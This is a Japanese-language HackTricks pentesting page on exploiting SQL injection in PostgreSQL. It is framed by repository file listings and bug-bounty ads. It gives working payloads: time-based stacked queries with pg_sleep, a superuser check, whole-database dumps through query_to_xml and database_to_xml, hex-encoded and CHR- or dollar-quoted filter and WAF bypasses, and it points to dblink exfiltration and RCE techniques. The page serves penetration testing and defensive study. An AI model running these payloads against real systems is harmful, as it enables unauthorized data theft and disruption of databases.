hacktricks/pentesting-web/sql-injection/postgresql-injection
2023-07-07 23:42:27 +00:00
..
big-binary-files-upload-postgresql.md Translated to Japanese 2023-07-07 23:42:27 +00:00
dblink-lo_import-data-exfiltration.md Translated to Japanese 2023-07-07 23:42:27 +00:00
network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md Translated to Japanese 2023-07-07 23:42:27 +00:00
pl-pgsql-password-bruteforce.md Translated to Japanese 2023-07-07 23:42:27 +00:00
rce-with-postgresql-extensions.md Translated to Japanese 2023-07-07 23:42:27 +00:00
rce-with-postgresql-languages.md Translated to Japanese 2023-07-07 23:42:27 +00:00
README.md Translated to Japanese 2023-07-07 23:42:27 +00:00

PostgreSQLインジェクション

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥


バグバウンティのヒント: Intigritiサインアップしてください。これは、ハッカーによって作成されたプレミアムなバグバウンティプラットフォームです!今すぐhttps://go.intigriti.com/hacktricksに参加して、最大**$100,000**の報奨金を獲得しましょう!

{% embed url="https://go.intigriti.com/hacktricks" %}


このページでは、PostgreSQLデータベースで見つかったSQLインジェクションを悪用するためのさまざまなトリックを説明します。また、https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**で見つけることができるトリックを補完するためのトリックもあります。

ネットワークインタラクション - 特権昇格、ポートスキャナー、NTLMチャレンジレスポンスの開示とエクスフィルトレーション

dblinkは、攻撃者の観点から見ていくつかの興味深いオプションを提供するPostgreSQLモジュールです。これを使用して、他のPostgreSQLインスタンスに接続したり、TCP接続を実行したりすることができます。
これらの機能は、COPY FROM機能とともに使用して、特権昇格ポートスキャン、またはNTLMチャレンジレスポンスを取得することができます。
ここでこれらの攻撃方法を実行する方法を読むことができます。

dblinkと大きなオブジェクトを使用したエクスフィルトレーションの例

CTFの例で、データを大きなオブジェクトにロードし、その大きなオブジェクトの内容をdblink_connect関数のユーザー名にエクスフィルトレートする方法をここで読むことができます

PostgreSQL攻撃読み取り/書き込み、RCE、特権昇格

PostgreSQLからホストを侵害し、特権を昇格させる方法については、次を確認してください

{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}

WAFバイパス

PostgreSQL文字列関数

文字列の操作は、WAFやその他の制限をバイパスするのに役立つ場合があります。
このページ には、いくつかの便利な文字列関数があります。

スタッククエリ

PostgreSQLはスタッククエリをサポートしていますが、1つのレスポンスが期待されている場合に2つのレスポンスが返されると、いくつかのアプリケーションはエラーをスローする場合があります。しかし、タイムインジェクションを介してスタッククエリを悪用することはまだ可能です

id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -

XMLのトリック

query_to_xml

この関数は、すべてのデータをXML形式で1つのファイルに返します。1行に大量のデータをダンプしたい場合に最適です。

SELECT query_to_xml('select * from pg_user',true,true,'');

database_to_xml

この関数は、データベース全体をXML形式で1行にダンプしますデータベースが非常に大きい場合は注意してください。DoS攻撃を引き起こす可能性があります。また、自分自身のクライアントにも影響を与える可能性があります

SELECT database_to_xml(true,true,'');

16進数の文字列

もし、クエリを文字列の中に渡すことができる場合(例えば、query_to_xml関数を使用する場合など)、convert_fromを使用して文字列を16進数として渡すことができ、この方法でフィルタをバイパスすることができます。

{% code overflow="wrap" %}

select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -

{% endcode %}

禁止された引用符

もしペイロードで引用符を使用できない場合、基本的な節に対してCHRを使用してこれをバイパスすることができます(文字の連結はSELECT、INSERT、DELETEなどの基本的なクエリにのみ適用されます。すべてのSQL文には適用されません:

SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);

または$を使用しても同じ結果が返されます。

SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;


バグバウンティのヒント: Intigritiサインアップしてください。これは、ハッカーによって作成されたプレミアムなバグバウンティプラットフォームです!今すぐhttps://go.intigriti.com/hacktricksに参加して、最大**$100,000**の報酬を獲得しましょう!

{% embed url="https://go.intigriti.com/hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥